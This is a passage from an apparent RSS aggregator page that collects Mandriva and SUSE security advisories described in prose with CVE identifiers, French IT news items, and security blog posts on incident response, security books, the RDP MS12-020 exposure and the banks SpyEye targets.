3.1-ESV-R3, and 4.1-ESV before 4.1-ESV-R3 allows remote attackers to
cause a denial of service (daemon exit) via a crafted BOOTP packet
(CVE-2011-2749).

Packages for 2009.0 are provided as of the Extended Maintenance
Program. Please visit this link to learn more:
http://store.mandriva.com/product_info.php?cPath=149&products_id=490

The updated packages have been patched to correct these issues.
Channel Image14:56 MDVSA-2011:127: mozilla» Mandriva Security
Security issues were identified and fixed in mozilla firefox and
thunderbird:

Mozilla developers and community members identified and fixed several
memory safety bugs in the browser engine used in Firefox 3.6 and
other Mozilla-based products. Some of these bugs showed evidence of
memory corruption under certain circumstances, and we presume that
with enough effort at least some of these could be exploited to run
arbitrary code (CVE-2011-2982).

Security researcher regenrecht reported via TippingPoint's Zero Day
Initiative that a SVG text manipulation routine contained a dangling
pointer vulnerability (CVE-2011-0084).

Mozilla security researcher moz_bug_r_a_4 reported a vulnerability in
event management code that would permit JavaScript to be run in the
wrong context, including that of a different website or potentially
in a chrome-privileged context (CVE-2011-2981).

Security researcher regenrecht reported via TippingPoint's Zero Day
Initiative that appendChild did not correctly account for DOM objects
it operated upon and could be exploited to dereference an invalid
pointer (CVE-2011-2378).

Mozilla security researcher moz_bug_r_a4 reported that web content
could receive chrome privileges if it registered for drop events and a
browser tab element was dropped into the content area (CVE-2011-2984).

Security researcher Mitja Kolsek of Acros Security reported that
ThinkPadSensor::Startup could potentially be exploited to load a
malicious DLL into the running process (CVE-2011-2980).

Security researcher shutdown reported that data from other domains
could be read when RegExp.input was set (CVE-2011-2983).

Packages for 2009.0 are provided as of the Extended Maintenance
Program. Please visit this link to learn more:
http://store.mandriva.com/product_info.php?cPath=149&products_id=490

Additionally, some packages which require so, have been rebuilt and
are being provided as updates.
Channel Image14:56 MDVSA-2011:126: java-1.6.0-openjdk» Mandriva Security
Multiple vulnerabilities were discovered and corrected in
java-1.6.0-openjdk:

Unspecified vulnerability in the Java Runtime Environment (JRE)
component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29
and earlier, and 1.4.2_31 and earlier allows remote untrusted Java
Web Start applications and untrusted Java applets to affect integrity
via unknown vectors related to Deserialization (CVE-2011-0865).

Multiple unspecified vulnerabilities in the Java Runtime Environment
(JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update
29 and earlier, and 1.4.2_31 and earlier allow remote attackers
to affect confidentiality, integrity, and availability via unknown
vectors related to 2D (CVE-2011-0862).

Unspecified vulnerability in the Java Runtime Environment (JRE)
component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29
and earlier, and 1.4.2_31 and earlier allows remote untrusted Java Web
Start applications and untrusted Java applets to affect confidentiality
via unknown vectors related to Networking (CVE-2011-0867).

Unspecified vulnerability in the Java Runtime Environment (JRE)
component in Oracle Java SE 6 Update 26 and earlier allows remote
untrusted Java Web Start applications and untrusted Java applets
to affect confidentiality via unknown vectors related to SAAJ
(CVE-2011-0869).

Unspecified vulnerability in the Java Runtime Environment (JRE)
component in Oracle Java SE 6 Update 25 and earlier allows remote
attackers to affect confidentiality via unknown vectors related to 2D
(CVE-2011-0868).

Unspecified vulnerability in the Java Runtime Environment (JRE)
component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update
29 and earlier, and 1.4.2_31 and earlier allows remote untrusted
Java Web Start applications and untrusted Java applets to affect
confidentiality, integrity, and availability via unknown vectors
related to HotSpot (CVE-2011-0864).

Unspecified vulnerability in the Java Runtime Environment (JRE)
component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update
29 and earlier, and 1.4.2_31 and earlier allows remote untrusted
Java Web Start applications and untrusted Java applets to affect
confidentiality, integrity, and availability via unknown vectors
related to Swing (CVE-2011-0871).

Packages for 2009.0 are provided as of the Extended Maintenance
Program. Please visit this link to learn more:
http://store.mandriva.com/product_info.php?cPath=149&products_id=490

The updated packages have been upgraded to versions which is not
vulnerable to these issues.
Channel Image14:56 MDVSA-2011:125: foomatic-filters» Mandriva Security
A vulnerability has been discovered and corrected in foomatic-filters:

foomatic-rip allows remote attackers to execute arbitrary code via a
crafted *FoomaticRIPCommandLine field in a .ppd file (CVE-2011-2697,
CVE-2011-2964).

Packages for 2009.0 are provided as of the Extended Maintenance
Program. Please visit this link to learn more:
http://store.mandriva.com/product_info.php?cPath=149&products_id=490

The updated packages have been patched to correct this issue.
Channel Image14:56 MDVSA-2011:124: phpmyadmin» Mandriva Security
Multiple vulnerabilities has been discovered and corrected in
phpmyadmin:

libraries/auth/swekey/swekey.auth.lib.php in the Swekey authentication
feature in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1
assigns values to arbitrary parameters referenced in the query string,
which allows remote attackers to modify the SESSION superglobal array
via a crafted request, related to a remote variable manipulation
vulnerability. (CVE-2011-2505).

setup/lib/ConfigGenerator.class.php in phpMyAdmin 3.x before 3.3.10.2
and 3.4.x before 3.4.3.1 does not properly restrict the presence of
comment closing delimiters, which allows remote attackers to conduct
static code injection attacks by leveraging the ability to modify
the SESSION superglobal array (CVE-2011-2506).

libraries/server_synchronize.lib.php in the Synchronize implementation
in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 does not
properly quote regular expressions, which allows remote authenticated
users to inject a PCRE e (aka PREG_REPLACE_EVAL) modifier, and
consequently execute arbitrary PHP code, by leveraging the ability
to modify the SESSION superglobal array (CVE-2011-2507).

Directory traversal vulnerability in libraries/display_tbl.lib.php
in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1, when
a certain MIME transformation feature is enabled, allows remote
authenticated users to include and execute arbitrary local files
via a .. (dot dot) in a GLOBALS[mime_map][->name][transformation]
parameter (CVE-2011-2508).

Multiple cross-site scripting (XSS) vulnerabilities in the table Print
view implementation in tbl_printview.php in phpMyAdmin before 3.3.10.3
and 3.4.x before 3.4.3.2 allow remote authenticated users to inject
arbitrary web script or HTML via a crafted table name (CVE-2011-2642).

Directory traversal vulnerability in sql.php in phpMyAdmin 3.4.x before
3.4.3.2, when configuration storage is enabled, allows remote attackers
to include and execute arbitrary local files via directory traversal
sequences in a MIME-type transformation parameter (CVE-2011-2643).

Multiple directory traversal vulnerabilities in the relational
schema implementation in phpMyAdmin 3.4.x before 3.4.3.2 allow remote
authenticated users to include and execute arbitrary local files via
directory traversal sequences in an export type field, related to
(1) libraries/schema/User_Schema.class.php and (2) schema_export.php
(CVE-2011-2718).

libraries/auth/swekey/swekey.auth.lib.php in phpMyAdmin 3.x before
3.3.10.3 and 3.4.x before 3.4.3.2 does not properly manage sessions
associated with Swekey authentication, which allows remote attackers
to modify the SESSION superglobal array, other superglobal arrays,
and certain swekey.auth.lib.php local variables via a crafted query
string, a related issue to CVE-2011-2505 (CVE-2011-2719).

The updated packages have been upgraded to the 3.4.3.2 version which
is not vulnerable to these issues.
Channel Image14:56 MDVSA-2011:123: squirrelmail» Mandriva Security
Multiple vulnerabilities has been discovered and corrected in
squirrelmail:

functions/page_header.php in SquirrelMail 1.4.21 and earlier does not
prevent page rendering inside a frame in a third-party HTML document,
which makes it easier for remote attackers to conduct clickjacking
attacks via a crafted web site (CVE-2010-4554).

Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail
1.4.21 and earlier allow remote attackers to inject arbitrary
web script or HTML via vectors involving (1) drop-down selection
lists, (2) the > (greater than) character in the SquirrelSpell
spellchecking plugin, and (3) errors associated with the Index Order
(aka options_order) page (CVE-2010-4555).

Cross-site scripting (XSS) vulnerability in functions/mime.php in
SquirrelMail before 1.4.22 allows remote attackers to inject arbitrary
web script or HTML via a crafted STYLE element in an e-mail message
(CVE-2011-2023).

CRLF injection vulnerability in SquirrelMail 1.4.21 and earlier
allows remote attackers to modify or add preference values via a n
(newline) character, a different vulnerability than CVE-2010-4555
(CVE-2011-2752).

Multiple cross-site request forgery (CSRF) vulnerabilities in
SquirrelMail 1.4.21 and earlier allow remote attackers to hijack the
authentication of unspecified victims via vectors involving (1) the
empty trash implementation and (2) the Index Order (aka options_order)
page, a different issue than CVE-2010-4555 (CVE-2011-2753).

The updated packages have been upgraded to the 1.4.22 version which
is not vulnerable to these issues.
Channel Image14:56 MDVSA-2011:122: clamav» Mandriva Security
A vulnerability has been discovered and corrected in clamav:

Off-by-one error in the cli_hm_scan function in matcher-hash.c in
libclamav in ClamAV before 0.97.2 allows remote attackers to cause
a denial of service (daemon crash) via an e-mail message that is not
properly handled during certain hash calculations (CVE-2011-2721).

Packages for 2009.0 are provided as of the Extended Maintenance
Program. Please visit this link to learn more:
http://store.mandriva.com/product_info.php?cPath=149&products_id=490

The updated packages have been upgraded to the 0.97.2 version which
is not vulnerable to this issue.
Channel Image14:56 MDVA-2011:029: hplip» Mandriva Security
This package updates hplip to the latest version, bringing a lot
of bugfixes.
Channel Image14:56 MDVA-2011:028: mmc-wizard» Mandriva Security
mmc-wizard-1.0-13.13mdvmes5.2.noarch.rpm fixes the following issues:
- handle /usr/lib64/mmc or /usr/lib/mmc paths to the mmc scripts
- the package postfix-ldap is installed for the mail module
Channel Image14:56 MDVA-2011:027: bind» Mandriva Security
This is maintenance release that upgrades ISC BIND to the 9.7.4
version that addresses a lot of upstream bugs and fixes.
Channel Image14:56 Linux realtime kernel security update» SUSE Security Announcements
08 Feb 2011
Channel Image14:56 Linux kernel security update» SUSE Security Announcements
09 Mar 2011
Channel Image14:56 Linux kernel security update» SUSE Security Announcements
14 Dec 2010
Channel Image14:56 Linux kernel security update» SUSE Security Announcements
25 Jan 2011
Channel Image14:56 Linux kernel security update» SUSE Security Announcements
03 Jan 2011
Channel Image14:56 Linux kernel security update» SUSE Security Announcements
03 Nov 2010
Channel Image14:56 Linux kernel security update» SUSE Security Announcements
03 Jan 2011
Channel Image14:56 Linux kernel security update» SUSE Security Announcements
11 Feb 2011
Channel Image14:56 Linux kernel security update» SUSE Security Announcements
11 Jan 2011
Channel Image14:56 Linux kernel security update» SUSE Security Announcements
29 Jun 2011
Channel Image14:56 Linux kernel security update» SUSE Security Announcements
28 Apr 2011
Channel Image14:56 Linux kernel security update» SUSE Security Announcements
28 Apr 2011
Channel Image14:56 Linux kernel security update» SUSE Security Announcements
17 Sep 2010
Channel Image14:56 Linux kernel security problems» SUSE Security Announcements
11 Nov 2010
Channel Image14:56 Linux kernel security problems» SUSE Security Announcements
18 Apr 2011
Channel Image14:56 Linux Kernel security update» SUSE Security Announcements
15 Oct 2010
Channel Image14:56 Linux Kernel security update» SUSE Security Announcements
13 Oct 2010
Channel Image14:56 Libcloud, projet prioritaire de la Fondation Apache pour un cloud unifié» Actualités Open Source
Libcloud offre une interface unique à plus de 20 services de cloud, parmi lesquels figurent Amazon EC2 (Elastic Compute Cloud), Rackspace Cloud, les services (...)


Channel Image14:56 Les solutions décisionnelles Open Source s'affirment comme une alternative» Actualités Open Source
Infobright a ainsi vanté les capacités de la version 4.0 de sa base de données analytique à traiter « en temps quasi réel » des données envoyées par des (...)


Channel Image14:56 Les solutions BI Open Source s'affirment comme une alternative» Actualités Open Source
Infobright a ainsi vanté les capacités de la version 4.0 de sa base de données analytique à traiter « en temps quasi réel » des données envoyées par des (...)


Channel Image14:56 Le service Minitel définitivement abandonné en juin 2012» Actualités Réseaux
Annoncé mort puis ressuscité à moult reprises, c'est finalement l'an prochain que le Minitel tirera sa révérence. ''Nous avons décidé de repousser cet (...)
Channel Image14:56 Le fonds BlackRock détient 5,18% des droits de vote d'Alcatel-Lucent» Actualités Réseaux
Le fonds d'investissements BlackRock se veut le plus important au monde, avec 3 650 milliards de dollars d'encours sous gestion au 31 mars dernier. La (...)
Channel Image14:56 Le SDK Android peaufine la version 3.2» Actualités Open Source
Le kit de développement d'Android 3.2 propose des améliorations pour enrichir l'expérience utilisateur sur les tablettes, a déclaré Xavier Ducrohet, responsable (...)


Channel Image14:56 La Snecma mise sur une GED Open Source» Actualités Open Source
La division MRO (Maintenance, Repair and Overhaul) du groupe Safran, plus connue sous le nom Snecma assure la maintenance complète de moteurs d'avions (...)


Channel Image14:56 L'Open Invention Network reçoit le renfort de Facebook et HP pour protéger Linux» Actualités Open Source
Le groupe, soutenu par 300 entreprises, un nombre porté aujourd'hui à 334, envisage d'atteindre les 2 000 pour constituer un portefeuille de licences et (...)


Channel Image14:56 Keep CIRT and Internal Investigations Separate» TaoSecurity
A recent issue of the Economist featured an article titled Corporate fraud: Mind your language -- How linguistic software helps companies catch crooks. It offered the following excerpts:

To spot staff with the incentive to steal (over and above the obvious fact that money is quite useful), anti-fraud software scans e-mails for evidence of money troubles...

Ernst & Young (E&Y), a consultancy, offers software that purports to show an employee’s emotional state over time: spikes in trend-lines reading “confused”, “secretive” or “angry” help investigators know whose e-mail to check, and when. Other software can help firms find potential malefactors moronic enough to gripe online, says Jean-François Legault of Deloitte, another consultancy...

Dick Oehrle, the chief linguist on the project, explains how it works. First, the algorithm digests a big bundle of e-mails to get used to employees’ language. Then human lawyers code the same e-mails, sorting things as irrelevant, relevant or serious. The human feedback and the computers’ results are then reconciled, so the system gets smarter. Mr Oehrle says the lawyers also learn from the computers (presumably such things as empathy and the difference between right and wrong).

To find employees with the opportunity to steal, the software looks for what snoops call “out of band” events: messages such as “call my mobile” or “come by my office” suggest a desire to talk without being overheard. E-mails between an employee and an outsider that contain the words “beer”, “Facebook” or “evening” can suggest a personal relationship...

Employers without such technology are “operating blind”, says Alton Sizemore, a former fraud detective at America’s FBI... [N]early all giant financial firms now run anti-fraud linguistic software, but fewer than half of medium-sized or small financial firms do...

Prospective users typically pay for a single “snapshot” search of 12 months of company records, according to APEX Analytix, a developer of the software in Greensboro, North Carolina. For a company with 10,000 employees, this costs about $45,000. Unless a company is very small, evidence of fraud almost always surfaces, convincing clients to sign up for a yearly package that costs three or four times as much as a spot-check, says John Brocar of APEX Analytix.

Why spend the money... If a company shows it has systems in place to detect this kind of thing, and starts investigating before outsiders do, it may have an easier time in court.

When I read this story it reminded me of my advice to keep CIRT and Internal Investigations separate. Notice the repeated mention of "lawyers" in the Economist story. There is no reason for this sort of technology or responsibility to reside in the Computer Incident Response Team. CIRTs should focus on external threats. Internal Investigations should focus on internal threats, e.g. employees, contractors, and other authorized parties who may perform unauthorized activities. II should collaborate closely with legal and human resources and should not use CIRT tools or techniques. This separation of duties was invaluable when I ran GE-CIRT because we could reassure constituents that our analysts focused on bad guys outside the company, not our own users.

Channel Image14:56 Joe's Garage (SMB): Most Likely to be Pwned by RDP» F-Secure Antivirus Research Weblog
Last week, we advised readers to apply Microsoft update MS12-020 sooner than later. For those of you that have — good work. And if you haven't yet applied the patch — stop delaying.

Ever since MS12-020 was released, there's been a flurry of activity attempting to "weaponize" the Remote Desktop Protocol (RDP) vulnerability. The race to an exploit is on and is in top gear. Lab Analyst Timo Hirvonen is tracking the situation on his Twitter account.

This security update resolves two privately reported vulnerabilities in the Remote Desktop Protocol.
Microsoft Security Bulletin MS12-020 - Critical

So… just how many computer could be affected by this RDP bug?

Well, researcher Dan Kaminsky scanned the Internet and estimates that there are millions of computers that are exposed.

Extrapolating from this sample, we can see that there's approximately five million RDP endpoints on the Internet today.
RDP and the Critical Server Attack Surface

What do you need to do?

Lenny Zeltser offers the following advice.

Understand what systems in your environment expose RDP to the Internet. Create a plan to apply the MS12-020 as soon as practical.
The Risks of Remote Desktop for Access Over the Internet

A good portion of our (enterprise) readership has probably already started taking action on this issue.

Consumers (home users) don't generally have RDP enabled.

So… what does that leave us? Small and medium businesses.

As Casey John Ellis points out, Remote Desktop is very often enabled by outsourced IT contractors, and the small business owners may not have any idea that it's enabled.

RDP is usually enabled by I.T. contractors without explanation to the business owner
Why Small/Medium Businesses are at the Greatest Risk from the New Microsoft RDP Bug

We have to agree with Ellis, small and medium business are at significant risk. Fortunately, Ellis and a friend have offered a helpful tool that a small business owner could use to access risk: RDPCheck.

To use RDPCheck, visit rdpcheck.com. From there, you can initiate a scan for vulnerabilities on your IP address.

On 19/03/12 At 11:54 AM

Channel Image14:56 I’m Leaving Bleeding Threats!» Bleeding Edge Threats
After nearly 5 years as the founder and admin of Bleeding Edge Threats I must step out of the project. Sensory Networks, as many of you know, has very generously provided the financial support that’s made it possible for me to keep Bleeding Threats up and running over the last 12 months. My sincere thanks to [...]
Channel Image14:56 Is your bank on SpyEye's Top 40 list?» F-Secure Antivirus Research Weblog
Variants of the SpyEye trojan target banks using a plugin called webinject.txt. We collected 1,318 samples in our back end that matched those from SpyEye Tracker's RSS Feed. Taking a look inside, we discovered that this collection of samples contains 632 different bank domains and that commerzbank.com was the most targeted bank domain.

Here's a graph of the top 40 banks targeted by SpyEye:

SpyEye's Top 40 Banks
Click image to biggify.

The Y-Axis represents the number of instances a bank was referenced within the sample set.

And here's a table of the same:

List of SpyEye's Top 40 Banks

Don't see your bank on the list? Don't worry… if SpyEye doesn't target your bank, then perhaps ZeuS does.

Click here to download an Excel file with the data above.

Analysis by — M. Hyykoski






On 20/03/12 At 04:37 PM

Channel Image14:56 Interview with Matt Jonkman» Bleeding Edge Threats
http://beastorbuddha.com/2007/11/06/interview-with-matt-jonkman-founder-bleeding-edge-threats/ Good questions I thought, thanks to Drazen Drazic of Security-Assessment.com. His blog is one very worth keeping an eye on. Comments on the article very welcome! Matt
Channel Image14:56 Intel investit 300 millions de dollars en perspective des Ultrabooks» Actualités Poste de travail
Intel a annoncé qu'il allait investir 300 millions de dollars dans des sociétés qui développaient de nouvelles technologies pour les Ultrabooks, cette (...)
Channel Image14:56 Instaboard / new / 16th Apr / (Other)» Security BugWare
Instaboard SQL injection
Channel Image14:56 Infocus: WiMax: Just Another Security Challenge?» SecurityFocus News
WiMax: Just Another Security Challenge?
Channel Image14:56 Infocus: Responding to a Brute Force SSH Attack» SecurityFocus News
Responding to a Brute Force SSH Attack
Channel Image14:56 Infocus: Enterprise Intrusion Analysis, Part One» SecurityFocus News
Enterprise Intrusion Analysis, Part One
Channel Image14:56 Infocus: Data Recovery on Linux and ext3» SecurityFocus News
Data Recovery on Linux and <i>ext3</i>

>> Advertisement <<
Can you answer the ERP quiz?
These 10 questions determine if your Enterprise RP rollout gets an A+.
http://www.findtechinfo.com/as/acs?pl=781&ca=909
Channel Image14:56 Infocon: green» SANS Internet Storm Center, InfoCON: green
ISC StormCast for Monday, March 26th 2012 http://isc.sans.edu/podcastdetail.html?id=2422
Channel Image14:56 Impressions: Windows Sysinternals Administrator's Reference» TaoSecurity
Mark Russinovich and Aaron Margosis have written another awesome addition to the Microsoft Press catalog, Windows Sysinternals Administrator's Reference. Per my policy, because I did not read the whole book I am only posting "impressions" here and not a full Amazon.com review.

In brief this book will tell you more about the awesome Sysinternals tools than you might have thought possible. One topic that caught my attention was using Process Monitor to summarize network activity (p 139). This reminded me of Event Tracing for Windows and Network Tracing in Windows 7. I remain interested in this capability because it can be handy for incident responders to collect network traffic on endpoints without installing new software, relying instead on native OS capabilities.

I suggest keeping a copy of this book in your team library if you run a CIRT. Thorough knowledge of the Sysinternals tools is a great benefit to anyone trying to identify compromised Windows computers.

Channel Image14:56 Impressions: Web Application Security: A Beginner's Guide» TaoSecurity
As you might remember, when I write impressions of a book it means I didn't read the book thoroughly enough (in my mind) to write a review. In that spirit, I read Web Application Security: A Beginner's Guide by Bryan Sullivan and Vincent Liu. I liked the book because the authors spend the time explaining the technology in question. For example, I appreciated the discussion on the same origin policy, featuring memorable advice like "the same origin policy can't stop you from sending a request; it can only stop you from reading the response" (p 175).

I had one small issue with the book, and that involved its introduction to Microsoft's STRIDE model. I blogged about this years ago in Someone Please Explain Threats to Microsoft. The Web sec book says on p 36:

STRIDE is a threat classification system originally designed by Microsoft security engineers. STRIDE does not attempt to rank or prioritize vulnerabilities... instead, the purpose of STRIDE is only to classify vulnerabilities according to their potential effects. This is immensely useful information to have when threat modeling an application...

To see my critique of STRIDE, please see my linked post. Basically, STRIDE is best describe as "bad stuff," and includes a mix of attacks and vulnerabilities with no real "threats."

Nevertheless, if you're looking for a compact and detail-packed exploration of Web application security, take a look at Web Application Security: A Beginner's Guide.

By the way, I've written alot about confusing terms like "threat," "vulnerability," "risk," etc. over the years. One of my earliest posts provides background -- The Dynamic Duo Discuss Digital Risk if you are so inclined.

Channel Image14:56 Impressions: The Web Application Hacker's Handbook, 2nd Ed» TaoSecurity
In late 2009 I reviewed the first edition of The Web Application Hacker's Handbook. It was my runner-up for Best Book Bejtlich Read 2009. Now authors Dafydd Stuttard and Marcus Pinto have returned with The Web Application Hacker's Handbook, 2nd Ed.

This is also an excellent book, although I did not read it thoroughly enough to warrant a review. On p xxix the authors note that 30% of the book is "new or extensively revised" and 70% of the book has "minor or no modifications." I was very impressed to see the authors outline changes by chapter on pages xxx-xxxii. That is not common in second editions, in my experience.

The book is very thorough and introduces technology along with attacks and defenses. Their "hack steps" sections provide a playbook for assessing Web applications. Some sections even mention logging and/or alerting -- I'd like to see more of that here and elsewhere! The book also includes end-of-chapter questions with answers posted on the book Web site, mdsec.net/wahh.

Speaking of the Web site, the authors also post source code, links to tools, and checklists, plus labs costing a $7/hour fee. That is a new approach I haven't seen elsewhere, but I think it's an interesting idea.

At 912 pages WAHH2E offers a ton of content written in a clear and convincing style. Great work guys. My only concern was their refusal to cite sources. That makes a real difference in my mind; give credit where credit is due in the third edition.

Channel Image14:56 Impressions: The Tangled Web» TaoSecurity
Six years ago I reviewed Michal Zalewski's first book, Silence on the Wire. Michal is a security researcher who has consistently created high-quality content for a very long time, so I was pleased to receive a review copy of his newest book The Tangled Web.

I did not read the whole book, hence I'm posting only my "impressions" here. I recommend reading this book if you want to know a lot, and I mean a lot, about how screwed up Web browsers, protocols, and related technologies truly are. Because many points of the book are tied to specific browser versions, I suspect its shelf life to degrade a little more rapidly than some other technical titles. Still, I am shocked by the amount of research and documentation Michal performed to create The Tangled Web.

As always, Michal's content is highly readable, very detailed, and well-sourced. It's a great example for other technical authors. Great work Michal!

Channel Image14:56 Impressions: Network Warrior, 2nd Ed» TaoSecurity
Five years ago I reviewed the first edition of Network Warrior by Gary A. Donahue. Thank to O'Reilly I can post my "impressions" of the second edition of this great book. Although I read almost all of it, I am unable to post another review because Amazon.com has my previous review attached to the new edition.

In brief, Network Warrior, 2nd Ed is the book to read if you are a network administrator trying to get to the next level. All of my praise from the previous review apply to the new book. The book is really that good, primarily because it combines very clear explanations with healthy doses of real-world experience. Thanks to Mr Donahue for taking the time to update his book!

Channel Image14:56 Impressions: Hunting Security Bugs» TaoSecurity
I don't hunt security bugs for a living, but I've worked on teams that do and I find the process important to understand. A defender should appreciate the work that an adversary must perform in order to discover a vulnerability and weaponize an exploit. That is the spirit with which I read Hunting Security Bugs by Tom Gallagher, Bryan Jeffries, and Lawrence Landauer. When the book was published in 2006 all the authors worked at Microsoft and Microsoft Press published the book. (Yes, I did wait a long time to take a look at this title...)

Despite the passage of time, I thought HSB stood up very well. Most of the problems discussed in the book and the techniques to find them should still work today. The targets have changed somewhat (XP was the target in the book; Windows 7 would be more helpful today -- thought not everywhere).

Again, this is an impression and not a review, so I only offer thoughts and not opinions or judgements on the text. From what I saw, the book appears well written with helpful diagrams and screen shots. It covers a lot of surface area and ways to exploit it.

One note for the history buffs: the foreword says:

When Jesse James, the famous outlaw of the American West, was asked why he robbed banks, he replied, Thats where the money is.

I'm sure most of you think that Willie Sutton said that, not Jesse James. According to Snopes neither of them said it:

While lore would have it that the bank robber replied "Because that's where the money is" to that common question, Sutton denied ever having said it. "The credit belongs to some enterprising reporter who apparently felt a need to fill out his copy," wrote Sutton in his autobiography. "I can't even remember where I first read it. It just seemed to appear one day, and then it was everywhere."

But back to the book -- should you buy it? If your job involves finding vulnerabilities in Windows software (and this book does have more of a Windows slant), I would take a close look at it.

Channel Image14:56 Impressions: Fuzzing» TaoSecurity
Fuzzing by Michael Sutton, Adam Greene and Pedram Amini struck me as a good overview of many types of fuzzing techniques. If you read the Amazon.com reviews, particularly the verdict by Chris Gates, you'll see what I mean. For my purposes, the degree to which the authors covered the material was just right. If you're more in the trenches with this topic, you would probably want more from a book on fuzzing.

I liked the following aspects of the book: integration of history, real examples, diversity of approaches, case studies, and examples. I thought the book was easy to read and well presented. Paired with more specific, newer books on finding vulnerabilities, I think Fuzzing is a winner.

My only real dislike involved the quotes by former US President George W. Bush at the start of each chapter. I thought they were irrelevant and a distraction.

Channel Image14:56 Illustrating why Twitter can't replace website comments» OSNews
A few months ago, I wrote an article about comments, in which I said, among others things, that Twitter can never replace comments because not only is it effectively a one-to-one communication channel, Twitter messages are also far too short to foster any form of coherent conversation. Over the weekend, a silly link-bait story illustrated my point perfectly.
Channel Image14:56 Il y a trente ans sortait l'IBM 5150, élu « homme de l'année » par Time» Actualités Poste de travail
Il y a trente ans jour pour jour, le 12 août 1981, IBM présentait à la presse son premier PC, le 5150, qui allait révolutionner l'usage de l'ordinateur (...)
Channel Image14:56 IDC révise ses prévisions sur les ventes de processeurs pour PC» Actualités Poste de travail
Le cabinet d'études IDC a revu ses prévisions de croissance pour les livraisons mondiales de processeurs pour PC en 2011, en raison d'un ralentissement (...)
Channel Image14:56 IBM déclare la fin de l'ère du PC, Microsoft parle de l'ère PC-plus» Actualités Poste de travail
Est-ce nous vivons désormais dans un monde «post-PC» ? Steve Jobs pense définitivement que oui. Selon le patron d'Apple, l'iPad a fait entrer le monde (...)
Channel Image14:56 IBM cède le code de Symphony à la Fondation Apache» Actualités Open Source
L'annonce a été faite en Allemagne où se tient l'ODF Plug-Fest. IBM a fait don du code de Symphony à la Fondation Apache. Elle pourrait intégrer ce code (...)


Channel Image14:56 IBM Java security update» SUSE Security Announcements
22 Mar 2011
Channel Image14:56 IBM Java 6 security update» SUSE Security Announcements
25 Jan 2011
Channel Image14:56 IBM Java 1.4.2 security update» SUSE Security Announcements
17 Dec 2010
Channel Image14:56 IBM Java 1.4.2 security problems» SUSE Security Announcements
11 May 2011
Channel Image14:56 I Want to Detect and Respond to Intruders But I Don't Know Where to Start!» TaoSecurity
"I want to detect and respond to intruders but I don't know where to start!" This is a common question. Maybe you have a new security role in an organization, or a new service or business in your current organization, or some other situation where you want to find and stop attackers. However, you have no idea where to begin. Do you have the data you need? If not, what should you add? What do intrusions look like in the data you collect?

These questions can be tough to answer from a purely theoretical perspective. I propose the following approach.

First, conduct a tabletop exercise where you simulate adversary actions. At each stage of the imagined attack, consider what evidence an intruder might create while taking actions against your systems. For example, if you are trying to determine how to detect and respond to an attack against a Web server, you're almost certainly going to need Web server logs. If you don't currently have access to those logs, you've just identified a gap that needs to be addressed. I recommend this sort of tabletop exercise first because you will likely identify deficiencies at low cost. Addressing them might be expensive though.

Second, conduct a technical exercise where a third party simulates adversary actions. This is not exactly a pen test but it is the sort of work a red team conducts. Ask the red team to carry out the attacks you previously imagined to determine if you can detect and respond to their activity. This should be a controlled action, not an "anything goes" event. You will see whether the evidence and processes you identified in the first step help you detect and respond to the red team activity. This step is more expensive than the previous because you are paying for red team attention, and again fixes could be expensive.

Third, you may consider re-engaging the red team to carry out a less restrictive, more imaginative adversary simulation. In this exercise the red team isn't bound by the script you devised previously. See if your improved data and processes are sufficient. If not, work with the red team to devise better detection and response so that you can handle their attacks.

At this point you should have the data and processes to deal with the majority of real-world attacks. Of course some intruders are smart and creative, but you have a chance against them now given the work you just performed.

Channel Image14:56 Happy 9th Birthday TaoSecurity Blog» TaoSecurity
Today, 8 January 2012, is the 9th birthday of TaoSecurity Blog. I wrote my first post on 8 January 2003 while working as an incident response consultant for Foundstone. 2843 posts later, I am still blogging. Looking at all 9 years of blogging, I averaged 315 per year, but in the age of Twitter (2009-2011) I averaged only 171 blog posts per year.

I plan to continue blogging, but I expect around the same number as last year -- somewhere in the 60 to 100 post range. I spend a lot more time expressing my views to the press and market researchers and analysts, so I'm often less inclined to do more of that in my free time through this blog. I plan to devote any decent chunks of free time to more traditional writing. I love to use Twitter for quick commentary. Thanks for joining me these 9 years -- I hope to have a 10 year post in 2013!

If you're a security blogger, and you like this blog, please consider voting for me via the 2012 Social Security Bloggers Awards. I'm nominated for "Most Educational Security Blog" and the Hall of Fame. Thank you again!

Don't forget -- today is Elvis Presley's birthday. Coincidence? You decide.

The image shows Elvis training with Ed Parker, founder of American Kenpo. As I like to tell my students, Elvis' stance is so wide it would take him a week to react to an attack. Then again, he's Elvis.

I studied Kenpo in San Antonio, TX but I'm going to try Tai Chi again, something I first practiced about 16 years ago in Billerica, MA during grad school.

Channel Image14:56 Gunter Ollmann: Time to Squish SQL Injection» SecurityFocus News
Time to Squish SQL Injection
Channel Image14:56 Google peaufine le SDK d'Android version 3.2» Actualités Open Source
Le kit de développement d'Android 3.2 propose des améliorations pour enrichir l'expérience utilisateur sur les tablettes, a déclaré Xavier Ducrohet, responsable (...)


Channel Image14:56 Google met son poids dans LibreOffice, qui valide une version entreprise» Actualités Open Source
Google, SUSE, Red Hat, Freies Office Deutschland eV, Software in the Public Interest et la Free Software Foundation vont ainsi tous siéger pour une période (...)


Channel Image14:56 Google defends Hotfile (and Megaupload) in court» OSNews
"Google has filed a brief at a federal court in Florida defending the file-hosting site Hotfile in its case against the MPAA. The search giant accuses the movie companies of misleading the court and argues that Hotfile is protected under the DMCA's safe harbor. Indirectly, Google is also refuting claims being made by the US government in the criminal case against Megaupload." Obviously, Google isn't really defending Hotfile or MegaUpload here - they're defending themselves by proxy.
Channel Image14:56 Goliath v. David, AAC style» OSNews
"Last week a large, profitable company sued a small start-up business for patent infringement. As a non-legal person, I can only guess that this sort of thing must happen fairly often. I would also guess that the large companies, which have the means to hire crackerjack legal teams and drag cases out, must often win. And while I guess I feel bad for the small businesses, I've never really cared before now. Because this time, the stakes are high. This time, it's my daughter's voice on the line. Literally." Infuriating. Maybe these are the kinds of stories we need to get normal people to care enough to force lawmakers to change. Sadly, the big bags of money from Apple, Microsoft, and Oracle are probably far more important to them than this sad story.
